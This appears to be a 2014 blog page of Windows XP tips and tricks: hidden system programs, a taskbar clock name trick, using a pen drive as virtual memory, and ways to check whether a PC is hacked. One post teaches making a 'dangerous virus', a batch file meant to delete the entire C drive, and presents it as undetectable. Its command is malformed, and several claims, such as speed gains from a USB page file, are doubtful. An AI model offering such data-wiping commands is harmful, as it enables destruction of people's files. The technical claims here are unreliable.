Thursday, April 3, 2014

Hidden secret in xp window

Is it strange to hear , Is it strange to hear , but true that some good programs are hidden in Windows XP !!! Programs :

1. Private Character Editor :
Used for editing fonts,etc.
** start>>Run
** Now, type eudcedit
2. Dr. Watson :
This an inbuilt windows repairing software !
** start>>Run
** Now, type drwtsn32
3. Media Player 5.1 : Even if you upgrade your Media Player, you can still access your old player in case the new one fails !!!

** start>>Run
** Now, type mplay32
4. iExpress :
Used to create SetupsYou can create your own installers !
** start>>Run
** Now, type iexpress but true iexpress

Trick to Show ur name after time in taskbar...


Hi freinds !
I m here to tell u a trick to add
up ur name in place of AM and
PM beside time and make urself
to feel proud among ur group of
frnds.
Its simple
Start -> Control Pannel ->
Regional and LAnguage option ->
Customize (beside English US) ->
Go to TIME tab -> Change AM
symbol and PM symbol from AM
and PM to ur name -> Apply ->
Ok ...
IS it changed ??? Might be
not ...Now go to time in taskbar
and Double Click it to open "Date
and time property" ...Look place
where time chnges in digital form
i.e. 02:47:52 AM , click to arrow
to cnage the AM or PM by
selecting and press arrow. It will
Show ur name or name that was
entered by u, Apply -> OK and be
HAPPY 8)

Learn To Make Dangerous Virus In A Minute............



In this post i will teach you to make simple yet very powerfull or you can say harmfull computer virus using a batch file. No software is required to make this virus, Noteapad is enough for it. The good thing about this virus is it is not detected by any AntiVirus.

What will this virus do ?

You will create this virus using batch file programming. This virus will delete the C Drive completely. The good thing about this virus is that it is not detected by antivirus.

 How to Make the virus?

1. Open Notepad and copy below code into it:

@Echo off Del C:\ *.* |y

2. Save this file as virus.bat (Name can be anything but .bat is must)

3. Now, running this file will delete all the content of C Drive. Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer

USE YOUR PENDRIVE AS SYSTEM RAM

USE YOUR PENDRIVE AS YOUR SYSTEM RAM

1) First Insert the Pen Drive atleast having an memory of 1GB , ( Preferably 4GB) in the Given USB port of the Computer

2) Wait for the Pen Drive Detection and see whether it is detected or not

3) After detection of Pen Drive, you should do the following things Carefully

4) Now go to My Computer and right click it, then go to the Properties

5) Now go to Advanced and then to the Performance settings

6) Click on Properties from context menu. Click on Advanced tab. Click on Settings under Performance . Click on Advanced tab. Click on Change button under Virtual memory. Select your USB drive.

7)Click on custom size radio button and give

8)the values as follows;

Initial Size:1020
Maximum size:1020
The size depends upon your free memory capacity of your pen drive. So you can change this limit according to your pen drive size. Click on Set button,

9)then click on OK . Now you have to restart the computer with pen-drive inserted. The speed of your computer will be increased.

10)Now again Advanced, and go to Change

5 Ways to Check if you are Hacked

NOTE:- Before doing these steps, close all the downloads and web pages. Make sure on torrent of window update install is going on but stay connected to internet.

1) The first method is very simple for all the people using an ADSL router. After all the internet downloads are closed, just check the status of Ethernet light. It should not blink at a very fast rate. It shows that packets are being transferred in and out of your computer.

But as there is no active download or internet activity so no packets should transfer. If so… you might be hacked

2) goto run and type cmd. The command prompt will open. In the command prompt type netstat -a This shows the list of active internet connections, check if any unnecessary internet connection is ESTABLISHED. If so, you might be hacked if you type just netstat, you will get the list of all the netstat commands, you may try the other commands as well.

3) You notice any abnormal activity in your computer, like your computer hangs for a couple of seconds every time you switch it on or in between your tasks (if it occurs often), there is a chance that you are hacked.

Often keyloggers and trojans are configured to deliver all the log information to the destination ip address/ ftp address after reqular interval of time. And when this information is being sent, the browser hangs for some time.

4) Use softwares like TCP view, it gives the list of all the connections made through TCP. This software is capable of detecting almost all the trojan/ malicious connections.

5) Keep the antivirus updated and install an external firewall like comodo. If your antivirus is not updated regularly, it is as good as nothing. If you don’t update your antivirus reqularly and often exchange data from other computers and download a lot of files. There is a great possibility that you are hacked.

Beware!! Stay updated, stay Protected.